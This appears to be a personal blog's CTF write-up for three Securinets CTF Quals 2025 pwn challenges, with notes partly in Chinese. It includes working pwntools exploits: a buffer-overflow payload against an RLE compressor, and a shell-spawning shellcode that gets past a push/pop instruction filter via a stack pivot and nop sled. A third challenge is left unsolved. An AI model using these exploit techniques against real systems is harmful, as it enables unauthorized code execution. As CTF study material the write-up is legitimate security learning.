503 words

3 minutes

Write-ups: Securinets CTF Quals 2025

2025-10-04

2025-10-06

Write-ups

Pwn

/

Write-ups

zip++#

Information#

Category: Pwn
Points: 500

Description#

why isn’t my compressor compressing ?!

Write-up#

问 AI，得知 compress 函数实现了一个 RLE (Run-Length Encoding) 压缩算法，压缩后格式为 [字节 1][重复次数 1][字节 2][重复次数 2]...，因此如果我们输入交替字符就会导致压缩率很差，溢出返回地址。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ELF,
5
    args,
6
    context,
7
    flat,
8
    process,
9
    raw_input,
10
    remote,
11
)
12

13

14
FILE = "./main"
15
HOST, PORT = "pwn-14caf623.p1.securinets.tn", 9000
16

17
context(log_level="debug", binary=FILE, terminal="kitty")
18

19
elf = context.binary
20

21

22
def launch():
23
    global target
24
    if args.L:
25
        target = process(FILE)
26
    else:
27
        target = remote(HOST, PORT)
28

29

30
def main():
31
    launch()
32

33
    payload = flat(
34
        b"AB" * 0xC6,
35
        b"\xa6" * 0x11,
36
    )
37
    raw_input("DEBUG")
38
    target.sendafter(b"data to compress :", payload)
39
    raw_input("DEBUG")
40
    target.sendline(b"exit")
41

42
    target.interactive()
43

44

45
if __name__ == "__main__":
46
    main()

Flag#

Securinets{my_zip_doesnt_zip}

push pull pops#

Information#

Category: Pwn
Points: 500

Description#

Shellcoding in the big 25 😱

Write-up#

有意思，第一次见 python 写的 pwn 题，这题只允许使用 push, pop 和 int 3 指令，但是测试发现非法指令会导致 capstone 直接返回 None，使得后面的指令不会被检查，那我们只要栈迁移到 mmap 出来的地方，然后 nop sled 到 shellcode 就好了。

祭出指令表：X86 Opcode and Instruction Reference Home

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ELF,
5
    args,
6
    asm,
7
    b64e,
8
    context,
9
    disasm,
10
    flat,
11
    process,
12
    raw_input,
13
    remote,
14
    shellcraft,
15
)
16

17

18
FILE = "./main.py"
19
HOST, PORT = "pwn-14caf623.p1.securinets.tn", 9001
20

21
# context(log_level="debug", binary=FILE, terminal="kitty")
22
context(log_level="debug", terminal="kitty", arch="amd64")
23

24
elf = context.binary
25

26

27
def launch():
28
    global target
29
    if args.L:
30
        target = process(["python3", FILE])
31
        # gdb.attach(target, gdbscript=gdbscript)
32
    else:
33
        target = remote(HOST, PORT)
34

35

36
def main():
37
    launch()
38

39
    payload_1 = asm(
40
        """
41
        push r11
42
        pop rsp
43
        pop r15
44
        pop r15
45
        pop r15
46
        pop r15
47
        push r15
48
        push r15
49
        push r15
50
        """
51
    )
52

53
    payload_2 = b"\x06" + b"\x90" * 0x10 + asm("add rsp, 0x100") + asm(shellcraft.sh())
54
    target.success(disasm(payload_1))
55
    target.success(disasm(asm("add rsp, 0x100")))
56
    target.success(disasm(asm(shellcraft.sh())))
57
    raw_input("DEBUG")
58
    target.sendafter(b"Shellcode : ", b64e(payload_1 + payload_2))
59

60
    target.interactive()
61

62

63
if __name__ == "__main__":
64
    main()

Flag#

Securinets{push_pop_to_hero}

push pull pops REVENGE#

Information#

Category: Pwn
Points: 500

Description#

you aint getting away with it , not on my watch .

Write-up#

这次题目加了输入和解码出来的指令之间的长度检测：

1
if code_len != decoded:
2
    print("nice try")
3
    return False

那就把非法指令 ban 掉了，测试使用 semantically equivalent encodings 也没啥用，绕不开这个长度检测。

最后思路是自己构造一个 syscall，然后调用 read，这样就可以把 shellcode 读进去，不被过滤。

但是但是，我没做出来 :sob: 所以等有时间了再去复现一下吧，得学习一下怎么自己构造 syscall……

Exploit#

TODO

Flag#

复现。

Write-ups: Securinets CTF Quals 2025

https://cubeyond.net/posts/write-ups/securinets-ctf-quals-2025/

Author

CuB3y0nd

Published at

2025-10-04

License

CC BY-NC-SA 4.0

屋宇之术：Labyrinth of Houses

分岔的森林：angr 符号执行札记

push pull pops REVENGE